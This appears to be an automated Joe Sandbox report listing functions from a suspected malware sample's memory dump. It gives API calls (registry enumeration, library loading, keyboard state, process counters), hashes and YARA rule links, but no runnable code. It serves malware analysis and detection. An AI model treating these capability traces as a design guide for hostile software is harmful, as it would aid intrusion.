Instruction ID: 7c4c92e2a3a5c4ae61cb61a6b7f52e61d296e155ff6fada053a5f4cfc8b260a6
Opcode Fuzzy Hash: b82929fb7399f26f55ba69fb4c7603360005287f4bbf0bc46e13b7cb79dd6252
Instruction Fuzzy Hash: D9113C31D0051DD7CF009FA5E948AEEFB7AFF0A751F004466EA41BB240DB709590CBA5

Function 00641AE8 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 49COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 00641B19

Strings

APPEND, xrefs: 00641B52
KEYS, xrefs: 00641B30
EXISTS, xrefs: 00641B41
REMOVE, xrefs: 00641B1F

Memory Dump Source

Source File: 00000000.00000002.2152928203.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2152911154.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153027916.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153052775.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_C5JLkBS1CX.jbxd

Similarity

API ID: BuffCharUpper
String ID: APPEND$EXISTS$KEYS$REMOVE
API String ID: 3964851224-769500911
Opcode ID: 514a54a949190ffea514d8825178c068c78629e5214cdc6ab98e762359acf06d
Instruction ID: e73cfe1ce55f8e58f1f395baaa798b5afb0e6291b2398fc2d262112fd5ee85d1
Opcode Fuzzy Hash: 514a54a949190ffea514d8825178c068c78629e5214cdc6ab98e762359acf06d
Instruction Fuzzy Hash: 00115E309402498FCF44EF64D851AFEB7B6FF66304F104469D855AB692EB325D0ACB54

Function 0065EB55 Relevance: 7.7, APIs: 5, Instructions: 247COMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0065EC07
GetProcessIoCounters.KERNEL32(00000000,?), ref: 0065EC37
GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 0065ED6A
CloseHandle.KERNEL32(?), ref: 0065EDEB

Memory Dump Source

Source File: 00000000.00000002.2152928203.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2152911154.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153027916.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153052775.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_C5JLkBS1CX.jbxd

Similarity

API ID: Process$CloseCountersHandleInfoMemoryOpen
String ID:
API String ID: 2364364464-0
Opcode ID: 92bbf6ad41d15faab0954f85ec6ce3475cbef5ecf93f92e006b2604978e7595a
Instruction ID: 25b42d667efe13d763076e42715ff512ffe038bec64bf33bc6ad9f169fa37bc4
Opcode Fuzzy Hash: 92bbf6ad41d15faab0954f85ec6ce3475cbef5ecf93f92e006b2604978e7595a
Instruction Fuzzy Hash: 6F8193716043019FDB24EF29C846F6ABBE5BF84710F04891DF999DB392DAB1AD44CB81

Function 00660037 Relevance: 7.6, APIs: 5, Instructions: 144registryCOMMON

Download Yara Rule

APIs

Part of subcall function 005E7DE1: _memmove.LIBCMT ref: 005E7E22

Part of subcall function 00660E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0065FDAD,?,?), ref: 00660E31

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 006600FD
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0066013C
RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00660183
RegCloseKey.ADVAPI32(?,?), ref: 006601AF
RegCloseKey.ADVAPI32(00000000), ref: 006601BC

Memory Dump Source

Source File: 00000000.00000002.2152928203.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2152911154.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153027916.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153052775.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_C5JLkBS1CX.jbxd

Similarity

API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
String ID:
API String ID: 3440857362-0
Opcode ID: 6896ff9379c0f0857ae6eeb338944a9f7b2acf18731968852fca5d929a6ca57c
Instruction ID: 37c131cd28c23983ea3a6452bf4d36eeda18e9ffd81eedadab43f6ebb817e581
Opcode Fuzzy Hash: 6896ff9379c0f0857ae6eeb338944a9f7b2acf18731968852fca5d929a6ca57c
Instruction Fuzzy Hash: 71518D31208245AFD704EF94CC85EABBBEAFF85314F00492DF595872A2DB31E905CB52

Function 0065D8C8 Relevance: 7.6, APIs: 5, Instructions: 139libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 005E9837: __itow.LIBCMT ref: 005E9862
Part of subcall function 005E9837: __swprintf.LIBCMT ref: 005E98AC

LoadLibraryW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 0065D927
GetProcAddress.KERNEL32(00000000,?), ref: 0065D9AA
GetProcAddress.KERNEL32(00000000,00000000), ref: 0065D9C6
GetProcAddress.KERNEL32(00000000,?), ref: 0065DA07
FreeLibrary.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,?,?), ref: 0065DA21

Part of subcall function 005E5A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00647896,?,?,00000000), ref: 005E5A2C
Part of subcall function 005E5A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00647896,?,?,00000000,?,?), ref: 005E5A50

Memory Dump Source

Source File: 00000000.00000002.2152928203.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2152911154.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153027916.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153052775.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_C5JLkBS1CX.jbxd

Similarity

API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
String ID:
API String ID: 327935632-0
Opcode ID: 6d46d098ec3e34cae72e9c55ca2c61074366514d84ca0df7c40f7d1e91a1c0ce
Instruction ID: 612cf748e2e87d28b10fab6dd04aaa0cc6a06b7d1019f3f99f8ed6e57c9d6857
Opcode Fuzzy Hash: 6d46d098ec3e34cae72e9c55ca2c61074366514d84ca0df7c40f7d1e91a1c0ce
Instruction Fuzzy Hash: 5D513935A0424ADFCB14EFA9C4889ADBBF6FF49315F048065E855AB352DB30AD49CF90

Function 0064E571 Relevance: 7.6, APIs: 5, Instructions: 135COMMON

Download Yara Rule

APIs

GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 0064E61F
GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 0064E648
WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 0064E687

Part of subcall function 005E9837: __itow.LIBCMT ref: 005E9862
Part of subcall function 005E9837: __swprintf.LIBCMT ref: 005E98AC

WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 0064E6AC
WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 0064E6B4

Memory Dump Source

Source File: 00000000.00000002.2152928203.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2152911154.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153027916.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153052775.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_C5JLkBS1CX.jbxd

Similarity

API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
String ID:
API String ID: 1389676194-0
Opcode ID: 362c690227baaf56c0d97fe0b197b57d9edd17bc9a009d1aa032e8ab3d74e560
Instruction ID: a6890d45576ee1934285ce0be5604beb3774f9550e8f78686163eafaa95f4477
Opcode Fuzzy Hash: 362c690227baaf56c0d97fe0b197b57d9edd17bc9a009d1aa032e8ab3d74e560
Instruction Fuzzy Hash: DB51F735A001459FCB05EF65C985AAEBBF6FF49314F1480A9E849AB362CB31ED11DB50

Function 0066A056 Relevance: 7.6, APIs: 5, Instructions: 130COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2152928203.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2152911154.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153027916.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153052775.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_C5JLkBS1CX.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5d30a7cda751fa60894c2aef857d3edaa780f6ba80480d1af9de814b206b34f2
Instruction ID: 9e5dd49b454da2aa2f09095889efeaf601de77479791996fd71d78d5c7de2eb3
Opcode Fuzzy Hash: 5d30a7cda751fa60894c2aef857d3edaa780f6ba80480d1af9de814b206b34f2
Instruction Fuzzy Hash: B341A135904114AFD720DFA8DC48FE9BBAAEB0A310F150265F916B73E1CB70AD51DE91

Function 005E2344 Relevance: 7.6, APIs: 5, Instructions: 111keyboardCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 005E2357
ScreenToClient.USER32(006A57B0,?), ref: 005E2374
GetAsyncKeyState.USER32(00000001), ref: 005E2399
GetAsyncKeyState.USER32(00000002), ref: 005E23A7

Memory Dump Source

Source File: 00000000.00000002.2152928203.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2152911154.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153027916.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153052775.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_C5JLkBS1CX.jbxd

Similarity

API ID: AsyncState$ClientCursorScreen
String ID:
API String ID: 4210589936-0
Opcode ID: 6023fa61c5b66338dbdfb403aa4538d893aff0fb9f265a6e47e1afa085cf2672
Instruction ID: 403f1993749bc74d65a4f70022b7136aeb012ae256cfa6e743e229991526b0d0
Opcode Fuzzy Hash: 6023fa61c5b66338dbdfb403aa4538d893aff0fb9f265a6e47e1afa085cf2672
Instruction Fuzzy Hash: D0418E35604105FFCF298F69C844AEDBB7ABB09360F20471AF869D22A4C735AD90DF90

Function 006363AA Relevance: 7.6, APIs: 5, Instructions: 97windowCOMMON

Download Yara Rule

APIs

PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 006363E7
TranslateAcceleratorW.USER32(?,?,?), ref: 00636433
TranslateMessage.USER32(?), ref: 0063645C
DispatchMessageW.USER32(?), ref: 00636466
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00636475

Memory Dump Source

Source File: 00000000.00000002.2152928203.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2152911154.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153027916.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153052775.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_C5JLkBS1CX.jbxd

Similarity

API ID: Message$PeekTranslate$AcceleratorDispatch
String ID:
API String ID: 2108273632-0
Opcode ID: 6717ddc429c830dcf12d2fe84867a9b5f34520741e584bc12d8cfd461620dfaf
Instruction ID: 689f425fd56d50df1a66c7d57347922148f24156309aefacf953ac553ae7fbc3
Opcode Fuzzy Hash: 6717ddc429c830dcf12d2fe84867a9b5f34520741e584bc12d8cfd461620dfaf
Instruction Fuzzy Hash: CF317031D00656BEDB64DF70DC44BE67BEBAB02300F14D165F422C22A2E765A855DBA1

Function 00638A1F Relevance: 7.6, APIs: 5, Instructions: 89sleepwindowCOMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 00638A30
PostMessageW.USER32(?,00000201,00000001), ref: 00638ADA
Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 00638AE2
PostMessageW.USER32(?,00000202,00000000), ref: 00638AF0
Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 00638AF8

Memory Dump Source

Source File: 00000000.00000002.2152928203.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2152911154.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153027916.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153052775.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_C5JLkBS1CX.jbxd

Similarity

API ID: MessagePostSleep$RectWindow
String ID:
API String ID: 3382505437-0
Opcode ID: 388d28b0b84ee7832d39370015dbc273e092af1356a4f6c1b8d31d9798db75c9
Instruction ID: 8b7850902dcb075688c60357518388cfdc653f5fc441677f614fa5a383b0bb5b
Opcode Fuzzy Hash: 388d28b0b84ee7832d39370015dbc273e092af1356a4f6c1b8d31d9798db75c9
Instruction Fuzzy Hash: D5319C71900219EFDF14CFA8D94DADE7BB6EB05315F10822AF925EB2D1CBB09914DB90

Function 0063B1EC Relevance: 7.6, APIs: 5, Instructions: 88windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 0063B204
SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 0063B221
SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 0063B259
CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 0063B27F
_wcsstr.LIBCMT ref: 0063B289

Memory Dump Source

Source File: 00000000.00000002.2152928203.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2152911154.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153027916.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153052775.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_C5JLkBS1CX.jbxd

Similarity

API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
String ID:
API String ID: 3902887630-0
Opcode ID: f8ba65fe054f748e5c9063bdfe430dd23b72df5f5bb9445de7bb2ea44a5df5ae
Instruction ID: f38e66dcafdd4b339952efa39e44f823f5893fd7766739b29dd1304cabd5b82a
Opcode Fuzzy Hash: f8ba65fe054f748e5c9063bdfe430dd23b72df5f5bb9445de7bb2ea44a5df5ae
Instruction Fuzzy Hash: 652137312042007BEB159B75DC09EBF7B9EDF49710F10523DF904DA2A1EFA1DD4196A0

Function 0066B14B Relevance: 7.6, APIs: 5, Instructions: 85COMMON

Download Yara Rule

APIs

Part of subcall function 005E2612: GetWindowLongW.USER32(?,000000EB), ref: 005E2623

GetWindowLongW.USER32(?,000000F0), ref: 0066B192
SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 0066B1B7
SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 0066B1CF
GetSystemMetrics.USER32(00000004), ref: 0066B1F8
SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,00650E90,00000000), ref: 0066B216

Memory Dump Source

Source File: 00000000.00000002.2152928203.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2152911154.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153027916.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153052775.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_C5JLkBS1CX.jbxd

Similarity

API ID: Window$Long$MetricsSystem
String ID:
API String ID: 2294984445-0
Opcode ID: 51b6884fe4fd72e417113970602d3cee31968e1a84ecaa8dc0645bc02878fc57
Instruction ID: a879b4269211e494c605c8aac27b8315b5251050b5a6bae954fcabf33b81dc36
Opcode Fuzzy Hash: 51b6884fe4fd72e417113970602d3cee31968e1a84ecaa8dc0645bc02878fc57
Instruction Fuzzy Hash: 82219471510261EFCB109F38DC14AAA7BA6FB06361F156734F932D72E0D73099918B90

Function 00639307 Relevance: 7.6, APIs: 5, Instructions: 84windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00639320

Part of subcall function 005E7BCC: _memmove.LIBCMT ref: 005E7C06

SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00639352
__itow.LIBCMT ref: 0063936A
SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00639392
__itow.LIBCMT ref: 006393A3

Memory Dump Source

Source File: 00000000.00000002.2152928203.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2152911154.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153027916.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153052775.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_C5JLkBS1CX.jbxd

Similarity

API ID: MessageSend$__itow$_memmove
String ID:
API String ID: 2983881199-0
Opcode ID: fea4414fa1edefccebf7aec1ae0d80b648396d1cd2490439f7a1d860e726b143
Instruction ID: fe3b6ba11a90096d007b574022b33b2647b2d11d18dfdb4c6f1167c66e8e70f2
Opcode Fuzzy Hash: fea4414fa1edefccebf7aec1ae0d80b648396d1cd2490439f7a1d860e726b143
Instruction Fuzzy Hash: A821D771B04208BBEB109B659C89EEE7BAEEF89710F044029F945DB2D1D6F08D458BF1

Function 00655A4D Relevance: 7.6, APIs: 5, Instructions: 70COMMON

Download Yara Rule

APIs

IsWindow.USER32(00000000), ref: 00655A6E
GetForegroundWindow.USER32 ref: 00655A85
GetDC.USER32(00000000), ref: 00655AC1
GetPixel.GDI32(00000000,?,00000003), ref: 00655ACD
ReleaseDC.USER32(00000000,00000003), ref: 00655B08

Memory Dump Source

Source File: 00000000.00000002.2152928203.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2152911154.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153027916.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153052775.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_C5JLkBS1CX.jbxd

Similarity

API ID: Window$ForegroundPixelRelease
String ID:
API String ID: 4156661090-0
Opcode ID: ea1fc6328a2c295cdd757e5b4b5dacd5cf25cfed513c26f23a894f98dee72455
Instruction ID: 3ea9e17ad658f3fa3753c42d79bb48dba585ba5089575e570ad58c64ca5e8f47
Opcode Fuzzy Hash: ea1fc6328a2c295cdd757e5b4b5dacd5cf25cfed513c26f23a894f98dee72455
Instruction Fuzzy Hash: 4821A175A00104AFD704EF65DC98A9EBBEAEF48351F148079F84AD7362CA70AC05CB90

Function 005E12F3 Relevance: 7.6, APIs: 5, Instructions: 67COMMON

Download Yara Rule

APIs

ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 005E134D
SelectObject.GDI32(?,00000000), ref: 005E135C
BeginPath.GDI32(?), ref: 005E1373
SelectObject.GDI32(?,00000000), ref: 005E139C

Memory Dump Source

Source File: 00000000.00000002.2152928203.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2152911154.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153027916.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153052775.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_C5JLkBS1CX.jbxd

Similarity

API ID: ObjectSelect$BeginCreatePath
String ID:
API String ID: 3225163088-0
Opcode ID: 30bda724ace45d5bbcdc0f66db05724af3399062c43fffbfad54903913f37529
Instruction ID: c9f251a59515e4ce556570b410d717780b7bf800f0070f91903bbd15314ef731
Opcode Fuzzy Hash: 30bda724ace45d5bbcdc0f66db05724af3399062c43fffbfad54903913f37529
Instruction Fuzzy Hash: 6D21AF30900B58EFDB10EF26EC047AD7FAAFB05721F185626F852965B0D7B4A891CF94

Function 00644A93 Relevance: 7.6, APIs: 5, Instructions: 56synchronizationthreadwindowCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00644ABA
__beginthreadex.LIBCMT ref: 00644AD8
MessageBoxW.USER32(?,?,?,?), ref: 00644AED
WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00644B03
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00644B0A

Memory Dump Source

Source File: 00000000.00000002.2152928203.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2152911154.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153027916.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153052775.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_C5JLkBS1CX.jbxd

Similarity

API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
String ID:
API String ID: 3824534824-0
Opcode ID: a28cd3fbbac17eab6709f7d22bf958c06543a3bac9917a1d92c127e42cc4e726
Instruction ID: 6a18c337b18c4d877fe450b8af5880cf5ea81f51c0f530d6eb870987d85dddcc
Opcode Fuzzy Hash: a28cd3fbbac17eab6709f7d22bf958c06543a3bac9917a1d92c127e42cc4e726
Instruction Fuzzy Hash: 86112B76909614BBC700EFA8EC09BDB7FAEEB46320F154269F815D3351DAB1DD048BA0

Function 00638202 Relevance: 7.5, APIs: 5, Instructions: 49memoryCOMMON

Download Yara Rule

APIs

GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 0063821E
GetLastError.KERNEL32(?,00637CE2,?,?,?), ref: 00638228
GetProcessHeap.KERNEL32(00000008,?,?,00637CE2,?,?,?), ref: 00638237
HeapAlloc.KERNEL32(00000000,?,00637CE2,?,?,?), ref: 0063823E
GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00638255

Memory Dump Source

Source File: 00000000.00000002.2152928203.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2152911154.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153027916.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153052775.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_C5JLkBS1CX.jbxd

Similarity

API ID: HeapObjectSecurityUser$AllocErrorLastProcess
String ID:
API String ID: 842720411-0
Opcode ID: ed090fbb520d5003d9e0bd8ed397ce9d876eb3393ec2b6225c0aab42728c14b4
Instruction ID: 3b4ac89033ed85f5dc6b45a84d909fb2dae01b2229bf856deee6c09babe9e433
Opcode Fuzzy Hash: ed090fbb520d5003d9e0bd8ed397ce9d876eb3393ec2b6225c0aab42728c14b4
Instruction Fuzzy Hash: 67016D71200304BFDB204FA5EC48DAB7BAEFF8A754B500429F809C3220DAB29D10CAA0

Function 0063710A Relevance: 7.5, APIs: 5, Instructions: 48stringCOMMON

Download Yara Rule

APIs

CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00637044,80070057,?,?,?,00637455), ref: 00637127
ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00637044,80070057,?,?), ref: 00637142
lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00637044,80070057,?,?), ref: 00637150
CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00637044,80070057,?), ref: 00637160
CLSIDFromString.OLE32(?,?,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00637044,80070057,?,?), ref: 0063716C

Memory Dump Source

Source File: 00000000.00000002.2152928203.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2152911154.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153027916.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
